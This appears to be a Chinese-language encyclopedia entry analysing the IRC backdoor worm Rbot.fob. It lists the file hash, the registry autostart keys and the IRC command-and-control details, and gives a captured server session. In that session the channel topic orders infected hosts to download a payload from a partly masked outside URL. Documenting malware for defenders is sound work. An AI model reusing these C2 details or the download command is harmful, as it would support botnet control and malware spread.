Backdoor.Win32.Rbot.fob

Backdoor.Win32.Rbot.fob是一種後門病毒,感染Windows98以上版本系統。行為是複製自身到 %system32% 資料夾下gwbuahihk.exe。

病毒標籤:

病毒名稱: Backdoor.Win32.Rbot.fob
病毒類型: 後門
檔案 MD5: 45D0455398BD893176EB34C4B319D618
公開範圍: 完全公開
危害等級: 4
檔案長度: 506,880 位元組
感染系統: Windows98以上版本
加殼類型: Themida|WinLicense V1.9.2.0 -> Oreans Technologies [Overlay] *

病毒描述:

該病毒運行後,複製自身到%System32%目錄下,添加註冊表自動運行項以隨機引導
病毒體;連線網路下載病毒檔案,病毒運行後自我刪除,此病毒為一個利用Windows平台
下IRC協定的網路蠕蟲,受感染用戶可能會被操縱進行Ddos攻擊、遠程控制、傳送垃圾郵
件、創建本地Tftp、下載病毒檔案等行為。

行為分析:

本地行為:
1、複製自身到 %system32% 資料夾下gwbuahihk.exe。
2、新增註冊表:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run]
註冊表值: "Winds Sersc Agts"
類型: REG_SZ
值: "zxnyjgzyu.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\RunServices]
註冊表值: "Winds Sersc Agts"
類型: REG_SZ
值: "zxnyjgzyu.exe
網路行為:
1、連線IRC伺服器等待控制:
協定:TCP
連線伺服器名:irc.priv****t.com
域名或IP位址:
209.250.232.2***:7000
加入的 IRC 頻道名:
#FAAK#
用戶名:dcxvtfdxls (隨機小寫字母)
密碼:9400002290
對目標主機的操作:
/*暱稱*/
NICK CHN|9400002290
/*歡迎信息*/
:irc.priv****.com NOTICE AUTH
:*** Looking up your hostname...
:irc.priv****.com NOTICE AUTH
:*** Couldn't resolve your hostname
:using your IP address instead
:irc.priv****.com 001 CHN|9400002290
:irc.priv****.com 002 CHN|9400002290
: M0dded by uNkn0wn Crew
:irc.priv****.com 003 CHN|9400002290
:irc.priv****.com 004 CHN|9400002290
:www.uNkn0wn.eu - [email protected]
:irc.priv****.com 005 CHN|9400002290
:irc.priv****.com 005 CHN|9400002290
:irc.priv****.com 005 CHN|9400002290
/*設定用戶屬性與加入房間及返回相關信息*/
:irc.priv****.com 422 CHN|9400002290
:motd File is missing
:CHN|9400002290 MODE CHN|9400002290 :+iwG
:irc.priv****.com 302
MODE CHN|9400002290 -x+i
JOIN #FAAK# saad.
USERHOST CHN|9400002290
MODE CHN|9400002290 -x+i
JOIN #FAAK# saad.
USERHOST CHN|9400002290
MODE CHN|9400002290 -x+i
JOIN #FAAK# saad.
USERHOST CHN|9400002290
MODE CHN|9400002290 -x+i
JOIN #FAAK# saad.
:CHN|[email protected].*** JOIN :#FAAK#
:irc.priv****.com 333 CHN|9400002290 #FAAK# G_G 1211382006
:irc.priv****t.com 302 CHN|9400002290 :CHN|[email protected].***
:irc.priv****.com 302 CHN|9400002290 :CHN|[email protected].***
:irc.priv****.com 302 CHN|9400002290 :CHN|[email protected].***
/*加入房間#kok6*/
JOIN #FAAK# saad.
/*用戶信息顯示*/
USERHOST CHN|9400002290
:irc.priv****.com 302 CHN|9400002290 :CHN|[email protected].***
/*連線網路下載病毒*/
:irc.priv****.com 332 CHN|9400002290 #FAAK# :.jp]de100 http://members.ly***.co.uk/abosal7/usb.exe sty.exe
:irc.priv****.com 333 CHN|9400002290 #FAAK# G_G 1211382006
/*伺服器傳送連線回響*/
PING :irc.priv****.com
/*回應伺服器*/
PONG :irc.priv****.com
/*加入房間*/
JOIN #FAAK# saad.
2、連線網路下載病毒檔案:
協定:TCP
域名或IP位址:http://members.l****.co.uk (213.193.4.**)
連線埠:80
對目標主機的操作:下載病毒檔案
http://members.ly****.co.uk/abosal7/usb.exe
註: %System32% 是一個可變路徑。病毒通過查詢作業系統來決定當前 System資料夾的
位置。
%Windir% WINDODWS所在目錄
%DriveLetter% 邏輯驅動器根目錄
%ProgramFiles% 系統程式默認安裝目錄
%HomeDrive% 當前啟動的系統的所在分區
%Documents and Settings% 當前用戶文檔根目錄
%Temp% \Documents and Settings
\當前用戶\Local Settings\Temp
%System32% 系統的 System32資料夾
Windows2000/NT中默認的安裝路徑是C:\Winnt\System32
windows95/98/me中默認的安裝路徑是C:\Windows\System
windowsXP中默認的安裝路徑是C:\Windows\System32 
注2:與IRC伺服器的互動信息中,符號“/**/”內的數據是分析員對下一行或幾行的注釋信息,非為與伺服器的互動信息內容。 

相關詞條

相關搜尋

熱門詞條

聯絡我們